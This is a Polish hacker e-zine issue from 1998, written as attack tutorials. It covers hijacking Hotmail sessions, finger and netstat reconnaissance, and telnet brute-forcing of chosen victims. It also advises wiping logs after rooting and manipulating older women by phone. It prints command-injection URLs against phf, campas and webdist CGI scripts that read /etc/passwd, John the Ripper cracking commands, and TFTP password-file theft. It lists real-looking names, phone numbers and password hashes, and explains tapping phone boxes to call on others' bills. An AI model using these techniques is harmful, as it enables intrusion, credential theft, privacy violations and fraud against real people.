*** *** ****** ****** *** *** ******** ******
*** *** ******** ******** *** *** ********* ***
*** *** *** *** *** *** *** *** *** *** ***
*** *** *** *** *** *** *** *** *** ***
************ ********** *** ****** ********* *****
************ ********** *** ****** ****** *****
*** *** *** *** *** *** *** *** *** ***
*** *** *** *** *** *** *** *** *** *** ***
*** *** *** *** ******** *** *** *** *** ***
*** *** *** *** ****** *** *** *** *** *******
***** ***** ****** ******
****** ****** ******** ********
*** *** *** *** *** *** *** ***
*** ****** *** *** *** ***
*** **** *** ********** ***
*** *** ********** *** ****
*** *** *** *** *** ***
*** *** *** *** *** ***
*** *** *** *** ********
*** *** *** *** ******
=============================================================================
Mag na sierpien/wrzesien 1998 Numer 04 http://www.kki.net.pl/hackers
=============================================================================
Spis tresci:
1. Spis tresci
2. Slowo wstepne
3. Hotmail
4. Zdobywanie wielu kont
5. Phreak
6. Linki
7. Redakcja
-----------------------------------------------------------------------------
Wstep:
W poprzenim numerze pytalem ktora wersje (txt czy html) wolicie. Odpowiedzi
ktore nadeszly byly zarowno za wersja txt oraz html (z przewaga glosow za
html), wiec mag nadal bedzie wydawany w obu wersjach. Wersja orginalna zawsze
jest wtorzona w wersji tekstowej a dopiero pozniej przetwarzana na html.
Magazyn jak mozna zauwazyc jest dwu-miesiecznikiem i nic nie wskazuje na to
by sie to zmnienilo.
Richgyver
ps. Programow juz nie bede zamieszczal do magazynu tylko bede je umieszczal
na stronie www (http://www.kki.net.pl/hackers).
-----------------------------------------------------------------------------
Hotmail czesc 1:
Dosc znanym i dosc starym serverem udostepniajacym darmowe konta email jest
http://www.hotmail.com firmy Microsoft. Mozemy zalozyc sobie tam konto email
i miec do niego dostep przy pomocy przegladarki. Oczywiscie aby miec dostep
do swojego emaila musimy wpisac swoje haslo.... ale nie musimy. Jedna z
metod jest wpisanie w pole adresu przegladarki:
http://www.hotmail.com/cgi-bin/start/xxxxxxx
i w miejsce xxxxxx wpisac username (nazwe uzytkownika) czyli alias ktory
wystepuje przed znakiem @ w emailu danej osoby (xxxxxx@hotmail.com).
Czyli np. osoba ma adres email na serwerze hotmail:
zenek@hotmail.com
to wpisujemy w adres (w przegladarce):
http://www.hotmail.com/cgi-bin/start/zenek
Niestety ostatnio firma microsoft zwiekszyla troche zabezpeiczenia i
aby ta metoda dostac sie do konta ofiary musza byc spelnione nastepujace
warunki:
1. ofiara musiala kozystac ze swojego konto w ciagu ostatniej godziny
2. musimy miec ten sam adres IP co ofiara (wiec siedziec albo na tym samym
komputerze co nasza "ofiara" lub uzywac tego samego servera proxy)
Te warunki troche nam zmniejszaja szanase dostania sie ta metoda do konto
naszej "ofiary"... ale nastepne mozliwosc w nastepnym numerze.
Richgyver
-----------------------------------------------------------------------------
Zdobywanie wielu kont:
czesc 2: Analiza zdobytych danych: netstat, finger,
tftp, dziury w scriptach CGI-BIN...
Port surfing, wlamanie z wykorzystaniem
metody brutal force oraz po zlamaniu
hasla ze zdobytego pliku passwd
[ ewentualnie shadow ]...
=============================================================================
Dobra, spotykamy sie juz po raz drugi. Mam nadzieje, ze
kazdy zainteresowany zdobyl juz ( wykorzystujac metody z czesci 1 )
informacje potrzebne nam do tego artykulu. Jest tam duzo
informacji, ktorych sens postaram sie wam dalej wytlumaczyc.
***************************** NETSTAT **********************************
Netstat ( czyli Network Statistic ) daje nam wiele ciekawych
informacji, ktore mozemy wykorzystac potem do surfowania
po portach ( obecnie czesciej wykonuje sie to za pomoca
roznych skanerow, ale "wlasnoreczne" przeszukiwanie daje
nam wiecej satysfakcji :) Zagladamy wiec w plik raportu,
jaki stworzylismy wczesniej ( czesc 1 ). Powinno tam sie
znajdowac cos takiego:
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx.
Escape character is '^]'.
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (State)
tcp 0 0 *:673 *:* LISTEN
tcp 0 0 *:8080 *:* LISTEN
tcp 0 0 *:netbios-ssn *:* LISTEN
tcp 0 0 *:nntp *:* LISTEN
tcp 0 0 *:auth *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
tcp 0 0 *:pop3 *:* LISTEN
tcp 0 0 *:www *:* LISTEN
tcp 0 0 *:finger *:* LISTEN
tcp 0 0 *:domain *:* LISTEN
tcp 0 0 *:time *:* LISTEN
tcp 0 0 *:smtp *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:chargen *:* LISTEN
tcp 0 0 *:netstat *:* LISTEN
tcp 0 0 xxx.xxx.xxx.xxx:netstat ppp-rapxxx.konin:15558 ESTABLISHED
tcp 0 0 *:daytime *:* LISTEN
tcp 0 0 *:systat *:* LISTEN
tcp 1 0 xxx.xxx.xxx.:systat ppp-rapxxx.konin:15546 TIME_WAIT
tcp 1 0 xxx.xxx.xxx.:systat ppp-rapxxx.konin:15549 TIME_WAIT
tcp 1 1 xxx.xxx.xxx.xxx:1290 ppp-rapxxx.konin.:auth CLOSING
tcp 0 0 *:discard *:* LISTEN
tcp 1 0 xxx.xxx.xxx.xxx:1288 ppp-rapxxx.konin.:auth TIME_WAIT
tcp 0 0 *:echo *:* LISTEN
tcp 1 0 xxx.xxx.xxx.xxx:1286 ppp-rapxxx.konin.:auth TIME_WAIT
tcp 0 0 *:printer *:* LISTEN
tcp 0 0 *:shell *:* LISTEN
tcp 0 0 *:login *:* LISTEN
tcp 0 0 *:2049 *:* LISTEN
udp 0 0 *:671 *:*
udp 0 0 *:netbios-ns *:*
udp 0 0 *:sunrpc *:*
udp 0 0 *:3130 *:*
udp 0 0 *:domain *:*
udp 0 0 localhost:domain *:*
udp 0 0 xxx.xxx.xxx.:domain *:*
udp 0 0 *:time *:*
udp 0 0 *:chargen *:*
udp 0 0 *:daytime *:*
udp 0 0 *:discard *:*
udp 0 0 *:echo *:*
udp 0 0 *:ntalk *:*
udp 0 0 *:syslog *:*
udp 0 0 *:2049 *:*
udp 0 0 *:biff *:*
raw 0 0 *:1 *:*
Active UNIX domain sockets
Proto RefCnt Flags Type State Path
unix 2 [ ] SOCK_STREAM CONNECTED 678
unix 2 [ ] SOCK_STREAM UNCONNECTED 679
unix 2 [ ] SOCK_STREAM CONNECTED 682
unix 2 [ ] SOCK_STREAM UNCONNECTED 687
unix 2 [ ] SOCK_STREAM CONNECTED 690
( wycialem ostatnia kolumne - user [ ale nie bylo w niej nic ciekawego ] )
Sprobujmy wiec przeanalizowac, co tu mamy.
Pierwsza kolumna to ptotokul:
IP - internet protocol, pseudo protocol number
ICMP - internet control message protocol
GGP - gateway-gateway protocol
TCP - transmission control protocol
EGP - exterior gateway protocol
PUP - PARC universal packet protocol
UDP - user datagram protocol
HMP - host monitoring protocol
XNS-IDP - Xerox NS IDP
RDP - "reliable datagram" protocol
( najczesciej jest TCP [ Transmission Control Protocol ], lub UDP [ User
Datagram Protocol ] ), dalej Recived-Q i Sended-Q ( ktore nie sa dla nas
istotne ), Local Adress ( nazwa portu ), Foreign Adress ( adres komputera
laczacego sie z danym portem ), state ( status portu ), user ( uzytkownik )
Podstawowe porty, jakie powinienes znac to:
Nazwa: Nr.portu: Usluga:
echo 7 Cokolwiek napiszesz host odpisze to samo
discard 9 /dev/null
systat 11 Uruchamia na serwerze komende ps -auwwx
daytime 13 Czas i data na hoscie
netstat 15 Wlasnie to uruchomiles :) ( network statistic )
chargen 19 Zwraca nam ciag znakow ASCII. Aby je zatrzymac - ^C
ftp 21 File Transfer Protocol ( wiadomo )
telnet 23 Telnet ( wiadomo )
smpt 25 Poczta ( uzywajac tego portu mozna wysylac fake maile )
time 37 Zwraca czas
domain 53 Nazwa serwera
finger 79 Informacje o uzytkownikach
http 80 Serwer WWW
login 513 Login :)
shell 514 Zdalny shell
Teraz mozesz przeszukac serwer w poszukiwaniu czyis backdoors
lub laczyc sie z odpowiednim portem i probowac zdobyc jak najwiecej
danych. Kiedys mozna bylo wywolac przepelnienie stosu za pomoca
fingera ( wykorzystywala to bakteria Morrisa ) a tym samym zdobyc roota.
[ Wystepowalo to, gdy informacja podawana przez uzytkownika byla
dluzsza niz 512 bajtow. Demon fingerd przepelnial stos i pozwalal
na uruchomienie shella ]
Po polaczeniu na port 79 ( finger ;) mozemy wywolac 1 komende,
po czym zostajemy rozlaczeni. Jest to rownoznacze z wywolaniem:
% finger xxxxx@xxx.xxx.xxx.xxx
( lecz czasem podobno dzialaja takie komendy jak: help, ?, man
mi nie dzialaly, ale tak gdzies czytalem, chcecie to probujcie ;)
[ dla lamerow: ]
[ laczenie z odpowiednim portem: % telnet xxx.xxx.xxx.xxx nr.portu ]
******************************* FINGER **********************************
Teraz znow o FINGERze, ale w nieco innej formie.
Otoz zwraca nam on bardzo ciekawe informacje. W pliku
raport stworzonym po przeczytaniu 1 czesci artykulu powinno
znajdowac sie cos takiego:
....
[kinga.cyf-kr.edu.pl]
Login name: ucjaneck (messages off) In real life: Dariusz Janecki
Bldg: Uniwersytet, Work phone: 633 63 77w.229
Directory: /home/ucjaneck Shell: /usr/bin/tcsh
On since May 16 15:55:23 on ttyp1 from eter213.ch.uj.ed
13 minutes Idle Time
No Plan.
Login name: eyolejni (messages off) In real life: Barbara Olejnik
Bldg: Akademia Ek, Work phone: 616 76 98
Directory: /home/eyolejni Shell: /usr/bin/tcsh
On since May 16 15:51:18 on ttyp4 from pc8-153.ae.krako
2 minutes 31 seconds Idle Time
No Plan.
....
Wszystko jest chyba jasne. Mamy prawdziwe imie i nazwisko
tych ludzi, ich numery telefonow i kilka innych informacji.
Finger jest jednak coraz czesciej wylaczany przez administratorow,
w obawie przed zlymi hackerami i tzw. " system crackers " :)
Jest wiec wykomentowany z inetd.conf:
# finger stream tcp nowait nobody /usr/sbin/tcpd in.fingerd -w
Lub zamieniany na program, ktory po wywolaniu portu 79 zamiast
informacji o uzytkownikach wyswietli nam jakis napisik. Z ciekawszych,
jakie znalazlem to:
....
[giovanni.wmsd.edu.pl]
Sorry, no bonus this time...
[service.amu.edu.pl]
Sorry, finger is locked
[shadow.put.poznan.pl]
Politechnika Poznanska Poznan University of Technology
Uczelniane Centrum Obliczeniowe Computing Centre
------------------------------- --------------------------------
Dostep do tego systemu jest Access to this system is limited
ograniczony wylacznie dla komputerow only for hosts authorized by
autoryzowanych przez Uczelniane Centrum Computing Centre of Poznan
Obliczeniowe Politechniki Poznanskiej University of Technology
unknown@ppp-rapxxx.konin.tpnet.pl :)
nie ma autoryzacji zezwalajacej is not authorized to access
na dostep do systemu orion.put.poznan.pl orion.put.poznan.pl host
hostmaster@orion.put.poznan.pl
....
To ostatnie bylo chyba dzielem jakiegos wrappera ograniczajacego
dostep do tej uslugi ( ale i tak mi sie podobalo :).
Na wielu hostach jednak finger jeszcze dziala i mozna probowac.
********* /etc/passwd ( np. z plikow stworzonych przez monk.sh ) ************
Podobnych informacji co finger moze nam dostarczyc plik /etc/passwd
nawet jesli hasla sa shadowane. Wyglada to tak:
....
stink:x:1048:100:Gary Fisher,,415-306-9466,:/usr/home/stink:/bin/tcsh
....
ion:x:1051:100:Matt Glaspie,ION,810-669-1564,:/usr/home/ion:/bin/sh
....
A wiec otrzymujemy prawie te same informacje, co przy uzyciu fingera:
Login: stink
In real life: Gary Fisher
Organizacja: -
Numer telefonu: 415-306-9466
Katalog macierzysty: /usr/home/stink
Shell: /bin/tcsh
UID=1048
GID=100
Login:ion
In real life: Matt Glaspie
Oranizacja: ION
Numer telefonu: 810-669-1564
Katalog macierzysty: /usr/home/ion
Shell: /bin/sh
UID=1051
GID=100
Widzimy rowniez, ze wszyscy uzytkownicy naleza do grupy o GID=100
W tym przypadku numery telefonow i firma nie maja dla nas
wiekszej wartosci, ale jesli mamy plik passwd z polskiego
serwera, np.
....
pelka:x:558:110:Ania Pelka,OINiD,826-40-47,664-42-79:/home/PELKA:/bin/tcsh
....
kopyszew:x:593:110:Eugeniusz Kopyszew,
UW Wydz.Polonistyki,10-32-31(p.911),10-32-31(p.911):/home/kopyszew:/bin/bash
....
No coz - tutaj chyba wszystko jest jasne...
Do czego moga nam sie przydac informacje zdobyte fingerem ?
Otoz najprostrza forma dostania sie na czyjes konto jest
atak sposobem brutal force ( czyli zgadywanie hasel sposobem
chybil-trafil ). Wbrew pozorom akcja taka ma duze szanse
powodzenia. Wywolujemy wiec klienta telnetu, laczymy sie
z serwerem i mozemy probowac zgadnac haslo wykorzystujac:
login, imie, nazwisko, imie od konca, nazwisko od konca,
polaczenie imienia z nazwiskiem ( 3 litery imienia + 3 nazwiska,
itp. ), wszystko to uzupelnione cyfra 1, 0 ( pozostale
rzadko sie zdarzaja ), lub kilkoma cyframi ( np. 123, 098,
997, 998, 999 ), wykorzystujemy tez numer telefonu i inne
informacje ( strona WWW ). Kiedys udalo mi sie
w ten sposob zlamac kilka kont.
Calosc wygladala mniej wiecej tak:
% telnet
telnet> op xxx.xxx.xxx.xxx
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx
Escape character is '^]'.
FreeBSD (xxx.xxx.xxx.xxx) (ttyp0)
login: ofiara
Password: / tu wpisywalem hasla
Login incorrect / ale tego nie widac :)
login: ofiara
Password:
Login incorrect
login: ofiara
Password:
Login incorrect
login: ofiara
Password:
Login incorrect
login: ofiara
Password:
Login incorrect
login: ofiara
Password:
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
FreeBSD 2.2.6-BETA (hoth_ipf) #0: Sun Mar 15 13:03:32 MET 1998
Uzytkownik poprzez zalogowanie sie na swoje konto deklaruje, ze zapoznal
sie z Regulaminem oraz ze wyraza zgode na wszelkie formy monitorowania
swojej dzialalnosci i na wykorzystanie logow systemowych we wszelkich
sprawach administracyjnych, cywilnych i karnych.
Aktualny Regulamin: /regulamin
Zalecenia Bezpieczenstwa: /secure
Komunikaty Administratora: /admin
Welcome to FreeBSD!
You have mail.
tset: terminal type linux is unknown
Terminal type? ^D
Technological progress has merely provided us with more efficient means
for going backwards.
-- Aldous Huxley
xxxx: {1} ls
allegro.cfg mail public_html
xxxx: {2}
To jest zmieniony troche log sesji, a zamiescilem go
po to, aby ukazac, ze zgadniecie czyjegos hasla
jest naprawde mozliwe.
( zalaczam programik, ktory robi to za nas - brute.c )
( uzywamy go ( po kompilacji :) w polaczeniu ze slownikiem )
( $ brute ofiara slownik adres.serwera 23 )
Trzeba natomiast pamietac, ze wszelkie bledne proby logowania
sie zostana odnotowane w logach. Trzeba wiec albo nie przesadzac
z " napastowaniem " serwera ( po 2-3 proby dziennie ), albo
po dostaniu sie do systemu zdobyc roota i wyczyscic logi :)
Inna sprawa jest, ze ludzie sa naiwni i mozna od nich
wyludzic haslo nawet przez telefon :)))
Ja osobiscie nie lubie tego typu atakow, ale w chwili
desperacji ( gdy wszystkie znane dziury w serwerze sa
zapchane ) mozna probowac i tak. Trzeba oczywiscie
dobrac odpowiednio ofiare ( najlepsza jest kobieta,
starsza [ np. bibliotekarka, kustosz muzeum ] )
Naprawde mozna sie wiele dowiedziec o czlowieku przegladajac
strony WWW i laczac znalezione tam informacje np. z FINGERem.
No i trzeba to sprytnie wykorzystac...
Plik passwd mozemy obejrzec majac dostep do systemu za pomoca komendy
cat ( jesli hackujemy pod SHITem 95 mozemy ustawic logowanie
sesji i obejrzec je na spokojnie potem ). Nie chce mi sie tu rozpisywac
na temat sciagania hasel, gdy jestesmy juz w systemie,
bo nie o tym jest artykul. Grunt ze mozna je sciagnac za pomoca ftp
( ale nie anonimowego, bo wtedy glownym katalogiem dla nas nie jest / )
( lecz /home/ftp, tak wiec widziany przez nas plik /etc/passwd )
( to w rzeczywistosci /home/ftp/etc/passwd [ chociaz czasem )
( administratorzy sa na tyle glupi, ze przegrywaja plik /etc/passwd )
( do /home... ] )
% ftp xxx.xxx.xxx.xxx
Connected to xxx.xxx.xxx.xxx
220 xxx.xxx.xxx.xxx FTP server ready.
Name (xxx.xxx.xxx.xxx:twoj_login): nazwa_konta
Password: haslo_dla_tego_konta
ftp> get /etc/passwd /tmp/mam.je.u.siebie
....
ftp> quit
% _
Mozna tez wyslac plik passwd na jakies swoje trefne konto pocztowe.
Itp., itd. - gdy juz mamy konto, sposobow jest naprawde full...
Gdy hasla nie sa shadowane ( co obecnie zadko sie zdarza,
choc jakis miesiac temu znalazlem taki system, [ a tydzien temu drugi :) ])
znajduja sie w pliku /etc/passwd w postaci zakodowanej. Wyglada
to tak:
....
markl:93IGeQL45BmCk:549:100:Mark Lavery:/home/markl:/bin/tcsh
urgent:39Li4tqFigKbA:550:100:Jerry Burger:/home/urgent:/bin/tcsh
getitback:614QgdDEz8N2k:551:100:Gil Ziniga:/home/getitback:/bin/tcsh
....
Gdzie druga czesc linii ( po dwukropku ) to haslo ( zakodowane ).
Aby je zlamac trzeba uzyc programu lamiacego oraz slownika.
Programy takie sa ogolnie dostepne ( najlepsze to:
Cracker Jack, czy John the Ripper ). Dzialaja one
pod DOSem ( chociaz widzialem wersje Johna pod Unixa ).
W celu zlamania hasla musimy miec liste prawdopodobnych hasel
( tzw. slownik ;). Na jakiej zasadzie dziala program lamiacy ?
Zeby to zrozumiec nalezaloby najpierw zastanowic sie
w jaki sposob hasla sa kodowane przez systemy unixowe.
Otoz system koduje haslo ( max. 8 znakowe ) do 4096
wzorcow ( z ktorych kazdy ma po 13 znakow ) i jeden
z takich wzorcow zapisuje w pliku passwd lub shadow.
Mechanizm kodowania hasel jest jednostronny, a to oznacza,
ze hasel tych nie da sie odkodowac. Tak wiec programy
takie jak John The Ripper aby odkodowac haslo potrzebuja
listy slow, ktore kolejno koduja ( uzywajac tych samych
algorytmow co Unix ) do 4096 kombinacji i kolejno
przyrownuja do tego, ktore znajduja w pliku passwd.
Jesli oba zakodowane hasla sa identyczne, oznacza
to, ze znalezlismy haslo ( co sygnalizowane jest
cudownym beeeep z PC-Speaker'a ;)
OK. Jak uzywac Johna, czy Jacka?
Ja osobiscie wole John the Ripper'a (v1.4). Aby go uruchomic przeciwko
plikowi z haslami piszemy najpierw:
C:\JOHN> john.com -beep -single -pwfile:passwd
Co powoduje lamanie hasel bazujac na loginach, imionach i nazwiskach
uzytkownikow ( oraz ich przeksztalceniach ). Wszelkie przeksztalcenia
mozemy ustalic w pliku john.ini. W pliku john.pot znajduja sie
zlamane hasla, a w restore - dane ktore po przerwaniu programu pozwalaja
nam zaczac od ostatniego sprawdzonego slowa [ C:\JOHN> john.com -restore ]
Aby sprawdzic plik passwd z naszym slownikiem uruchamiamy:
C:\JOHN> john.com -beep -pwfile:passwd -wordfile:slownik
Ale lepiej jest odrazu wpisac:
C:\JOHN> john.com -beep -rules -pwfile:passwd -wordfile:slownik
Co spowoduje przeksztalcanie slow z naszej listy ( pierwsza litera
wielka, ostatnia, +cyfry, tworzenie form w czasie przeszlym
( +ed ), liczby mnogiej ( +s ) i inne ). Slowniki mozemy
sobie tworzyc sami, wyciagac slowa z plikow ( program extract.exe
z pakietu Cracker Jacka ), lub sciagnac z jakiejs fajnej strony WWW ;)
Co do Cracker Jacka to sprawa jest duzo prostrza. Piszemy:
C:\CJACK> jack.exe passwd slownik
i dziala. Podobnie jak w Johnie jack.pot - info o zlamanych
haslach, restore - dane do wznowienia sesji.
Acha... wznawianie sesji:
C:\CJACK> jack.exe -restore
Jesli nie mozemy zlamac hasla ( nie mamy go w slowniku nawet
po licznych permutacjach ), a jest ono dla nas bardzo wazne
( np. haslo root'a ), mozemy sprobowac zlamac je metoda
brutal force ( sprawdzic wszelkie mozliwe kombinacje liter ).
Do tego celu mozecie uzyc mojego programiku o nazwie
BrutaLDictor, ktory zalaczam do artykulu ( opis w pliku bdictor.txt )
Gdy program zlamie nam haslo mozemy sie zalogowac
na to konto uzywajac zdobytego hasla.
***************** SCRIPTY CGI-BIN ************************
Ciekawsza rzecza jest zdobycie pliku z haslami bez dostepu
do konta w systemie. Mozna to np. zrobic wykorzystujac
dziury w scriptach CGI-BIN z HTTPD. Sa one dosc stare i bardzo
rzadko dzialaja :(
I znow mozemy zdobyc albo plik z haslami zakodowanymi,
albo z "x" lub "*" w miejscu hasel ( oznacza to, ze
hasla sa shadowane i znajduja sie najczesciej w pliku
/etc/shadow, ale np. na FreeBSD 2.2.6 sa w /etc/master.passwd,
ich lokalizacje w roznych systemach podam na koncu artykulu ).
A oto kilka bardziej znanych dziur w tych scriptach.
Przypominam, ze uruchamiamy je z poziomu przegladarki
( np. IE czy Netscape pod Windowsem, czy lynx pod linuxem ).
Wiec wyglada to tak:
1). http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
gdzie:
Linie rozpoczynamy od: %0a
Zamiast spacji wstawiamy: %20
Mozemy w ten sposob uruchomic dowolna komende unixa, np.
http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0aid
http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/services
http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/ident.conf
http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/var/log/messages
http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/var/log/syslog
i inne w celu lepszego zapoznania sie z serwerem.
Nie mozna jednak uzywac mechanizmu potokow (|), przepisywac shelli,
dodawac + + do .rhosts , itp.
Pamietac nalezy rowniez, ze nasza dzialalnosc jest odnotowywana
w logach.
Dalszy komentarz jest chyba zbedny - wyswietlaja plik /etc/passwd :)
[ oczywiscie w ten sposob mozna obejrzec dowolny plik na serwerze ]
2). http://xxx.xxx.xxx.xxx/cgi-bin/php.cgi?/etc/passwd
3). http://xxx.xxx.xxx.xxx/cgi-bin/view-source?../../../../../../etc/passwd
4). http://xxx.xxx.xxx.xxx/cgi-bin/campas?%a/bin/cat%0a/etc/passwd
A te dzialaja na serwerach opartych na IRiX'ie:
5). http://xxx.xxx.xxx.xxx/cgi-bin/wrap?/etc / pokazuje zawartosc
/ katalogu /etc
/ i analogicznie inne
6). http://xxx.xxx.xxx.xxx/cgi-bin/webdist?distloc=;cat%20/etc/passwd
7). http://xxx.xxx.xxx.xxx/cgi-bin/handler/useless_shit;cat
/etc/passwd|?data=Download
W ten sam sposob mozna probowac sciagnac /etc/shadow, ale
szanse male.
Do tego artykulu dodam przerobiona przeze mnie wersje
scriptu monk.sh z pakietu XENOLITH. Testuje ona
wszyskie wymienione wyzej dziury.
( nazwa: cgitest )
( uruchomienie: % cgitest lista.serwerow )
********************* TFTP *****************************
W pliku z raportem z polaczen z TFTP zapewne nie znajdziesz
duzo. Jesli jednak znajdziesz serwer, z ktorym mozesz
sie polaczyc na port 69, uruchom klienta tftp i sprobuj
sciagnac plik passwd.
% tftp
tftp> connect xxx.xxx.xxx.xxx
tftp> get /etc/passwd /tmp/mam.je.u.siebie
tftp> quit
Jesli operacja taka sie powiedzie ( nie sa nalozone restrykcje
co do katalogu ) - masz hasla.
=============================================================================
W nastepnym numerze:
Sendmail, NFS, informacje z portu 11 ( systat ) i moze cos jeszcze ;)
=============================================================================
Pozdrowienia dla: KeenU'a, Kubi'ego, Dante, Sir D, BoBo i pozostalych.
" Nil mortalibus ardui (e)st... " - Horacy
arkth
-----------------------------------------------------------------------------
Phreak:
Chcialem na poczatku wyjasnic, coz to takiego oznacza slowo "PHREAK".
Oznacza to po prostu proby/czynnosc zwiazane z mozliwosciami dzwonienia przez
telefon i nie placac za to. Jest wiele sposobow na wykonywanie ww. czynnosci.
Kiedys (jakies dziesiec lat temu) bylo to dosc proste, dzis Telekomunikacja
Polska przeznacza dosc duze pieniadze na to by kazdy placil wszystkie rozmowy
telefoniczne. Ale tu nic na razie o tym nie bedzie, chcialbym tu napisac jak
TPSA (Telekomunikacja Polska Spolka Akcyjna) dba o to aby za kazda wykonana
rozmowe ktos zaplacil (ale kto to juz ich nie interesuje).
Otoz jak ktos nie ma co robic z pieniedzmi to moze sobie podlaczyc do
domu dwie linie telefoniczne (dwa numery telefoniczne). Jednym z takich ludzi
jestem ja (choc nie mam za duzo pieniedzy). Chodzi o to, ze ten drugi telefon
jest podlaczony do takiej malej skrzynki, ktora znajduje sie na mojej klatce
schodowej. Wszystko niby dobrze tylko po pewnym czasie na tej lini slyszalem
straszne trzaski, wiec dzwonie do TPSA, a na drugi dzien przyszedl jakis
facet. I co? I ten nie pozorny facet wzial srubokret, odkrecil dwie skrobki,
podlaczyl dwa kabelki do swojej sluchawki i juz dzwonil na moj koszt. Czyli
mogl kazdy przyjsc w nocy, zrobic to samo i dzwonic sobie na numery typu
0700 na moj koszt. Dwie plastikowe srobki to jest zabezpieczenie przed utrata
tysieczy zlotych jakie w taki sposob mozna komus nabic na liczniku w TPSA?
Co z tego wynika, to ze: nie nalezy dokladac sobie nowych lini telefonicznych
(jesli ktos mieszka w bloku) oraz gdy chcemy sobie podzwonic na numer numery
0700 to nalezy tylko poszukac takiej skrzynki i podlaczyc tam sluchawke.
Kiedys slyszalem w "informacjach" telewizyjnych, ze ktos sadowal sie z TPSA
wlasnie o to czy ww. typ skrzynki byl dobrze zabezpieczony (ktos mu nabil
licznik telefoniczny), podobno TPSA przegrala sprawe. To tyle na dzis.
nikito
-----------------------------------------------------------------------------
Linki do interesujacycg stron:
-strony zwiazane z h/p/c/v/a
-http://www.kki.net.pl/hackers
-http://www.inet.com.pl/rafal
-http://hack.netpol.pl
-http://kki.net.pl/glider
-http://www.kki.net.pl/~masher
Twoja strona tez moze znalezc sie w tym spisie. Musisz najpierw:
1. Umiescic ten "kawalek" kodu html na swojej stronie:
<-- Poczatek odnosnika do hackersmag -->
<-- Koniec odnosnika -->
2. Napisac do nas email (zadresowany do hackers@kki.net.pl) z informacja
o adresie twojej strony.
Jesli wszystko zrobiles poprawnie twoja strona zostanie umieszczona w naszym
spisie najciekawszych stron.
-----------------------------------------------------------------------------
W sklad redakcja tego maga wchodza:
-Richgyver (hackers@kki.net.pl)
-Lukas (chopin@friko.onet.pl)
-Arkth (arkth@friko4.onet.pl)
-nikito (superc@friko.sos.com.pl)
Jesli chcial cos napisac do naszego maga (a nam to sie by spodobalo)
lub napisales juz jakis tekst to wyslij to na adres: hackers@kki.net.pl
ze swoimi danymi. Kazdy taki piszacy do naszego maga dostanie wynagrodzenie
(pieniadze).
Zawsze wszystkie numery poprzednie oraz najnowszy numer naszego magazynu
mozesz sciagnac ze strony: http://www.kki.net.pl/hackers
Mozesz do nas napisac list, nasz email: hackers@kki.net.pl
Wszystkie materialy i informacje zawarte sa tu jedynie w celach
*EDUKACYJNYCH* i nikt z redakcji nie ponosi *ZADNEJ* odpowiedzialnosci, za
zle wykorzystanie podanych tu informacji...
/Koniec pliku tekstowego./